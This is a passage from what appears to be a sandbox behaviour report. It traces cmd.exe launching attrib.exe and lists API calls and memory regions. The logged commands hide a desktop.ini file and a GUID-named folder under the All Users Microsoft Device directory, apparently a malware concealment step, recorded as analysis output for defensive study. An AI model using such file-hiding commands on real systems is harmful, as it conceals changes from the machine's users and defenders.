lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.031] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.031] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.031] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.031] GetLastError () returned 0x2 [0150.031] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x332ed8 [0150.032] FindClose (in: hFindFile=0x332ed8 | out: hFindFile=0x332ed8) returned 1 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.032] GetLastError () returned 0x2 [0150.032] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x332ed8 [0150.032] FindClose (in: hFindFile=0x332ed8 | out: hFindFile=0x332ed8) returned 1 [0150.032] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.032] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.032] GetConsoleTitleW (in: lpConsoleTitle=0x2af01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.032] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef6c | out: lpAttributeList=0x2aeea4, lpSize=0x2aef6c) returned 1 [0150.032] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea4, lpPreviousValue=0x0) returned 1 [0150.032] GetStartupInfoW (in: lpStartupInfo=0x2aee60 | out: lpStartupInfo=0x2aee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.032] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.032] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef4c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" ", lpProcessInformation=0x2aef4c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xbd4, dwThreadId=0xb94)) returned 1 [0150.034] CloseHandle (hObject=0x50) returned 1 [0150.034] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.034] GetEnvironmentStringsW () returned 0x332ed8* [0150.035] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.035] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0150.076] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aee40 | out: lpExitCode=0x2aee40*=0x0) returned 1 [0150.076] CloseHandle (hObject=0x4c) returned 1 [0150.076] _vsnwprintf (in: _Buffer=0x2aef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee4c | out: _Buffer="00000000") returned 8 [0150.076] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.076] GetEnvironmentStringsW () returned 0x332ed8* [0150.076] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.076] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.076] GetEnvironmentStringsW () returned 0x332ed8* [0150.076] FreeEnvironmentStringsW (penv=0x332ed8) returned 1 [0150.076] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea4 | out: lpAttributeList=0x2aeea4) [0150.076] GetConsoleTitleW (in: lpConsoleTitle=0x2af288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.077] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0150.077] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0150.077] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.077] GetLastError () returned 0x2 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.077] GetLastError () returned 0x2 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x32e768 [0150.077] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 [0150.077] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0xffffffff [0150.078] GetLastError () returned 0x2 [0150.078] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aeb24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aeb24) returned 0x32e768 [0150.078] FindClose (in: hFindFile=0x32e768 | out: hFindFile=0x32e768) returned 1 [0150.078] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0150.078] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0150.078] GetConsoleTitleW (in: lpConsoleTitle=0x2af01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0150.078] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aeea4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aef6c | out: lpAttributeList=0x2aeea4, lpSize=0x2aef6c) returned 1 [0150.078] UpdateProcThreadAttribute (in: lpAttributeList=0x2aeea4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aef64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aeea4, lpPreviousValue=0x0) returned 1 [0150.078] GetStartupInfoW (in: lpStartupInfo=0x2aee60 | out: lpStartupInfo=0x2aee60*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0150.078] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0150.078] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aef00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aef4c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"", lpProcessInformation=0x2aef4c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x610, dwThreadId=0x47c)) returned 1 [0150.080] CloseHandle (hObject=0x4c) returned 1 [0150.080] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0150.080] GetEnvironmentStringsW () returned 0x333938* [0150.080] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.080] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0150.206] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aee40 | out: lpExitCode=0x2aee40*=0x0) returned 1 [0150.206] CloseHandle (hObject=0x50) returned 1 [0150.206] _vsnwprintf (in: _Buffer=0x2aef88, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aee4c | out: _Buffer="00000000") returned 8 [0150.206] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0150.207] GetEnvironmentStringsW () returned 0x333938* [0150.207] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.207] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0150.207] GetEnvironmentStringsW () returned 0x333938* [0150.207] FreeEnvironmentStringsW (penv=0x333938) returned 1 [0150.207] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aeea4 | out: lpAttributeList=0x2aeea4) [0150.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.207] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0150.207] _get_osfhandle (_FileHandle=1) returned 0x7 [0150.207] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0150.207] _get_osfhandle (_FileHandle=0) returned 0x3 [0150.207] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0150.208] SetConsoleInputExeNameW () returned 0x1 [0150.208] GetConsoleOutputCP () returned 0x1b5 [0150.208] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0150.208] SetThreadUILanguage (LangId=0x0) returned 0x409 [0150.208] exit (_Code=0) Process: id = "232" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16dc0" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19330 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19331 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19332 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19333 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 19334 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x3c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19335 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19336 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19337 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19338 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 19339 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19340 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19341 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19342 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19343 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 19344 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 19345 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19346 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19347 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19348 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19349 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19350 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19351 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19352 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19353 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19354 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19355 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19356 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19357 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19358 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19359 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 294 os_tid = 0xc88 Process: id = "233" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xbd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19466 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19467 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19468 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19469 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 19470 start_va = 0x480000 end_va = 0x486fff entry_point = 0x480000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19471 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19472 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19473 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19474 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 19475 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19476 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19477 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19478 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19479 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 19480 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 19481 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 19482 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19483 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 19484 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19485 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19486 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 19487 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19488 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19489 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19490 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 19491 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19492 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19493 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 19494 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19495 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 295 os_tid = 0xb94 Process: id = "234" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b60" os_pid = "0x610" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "231" os_parent_pid = "0x698" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19496 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19497 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19498 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19499 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19500 start_va = 0xcf0000 end_va = 0xcf6fff entry_point = 0xcf0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 19501 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19502 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19503 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19504 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 19505 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19506 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19507 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19508 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = 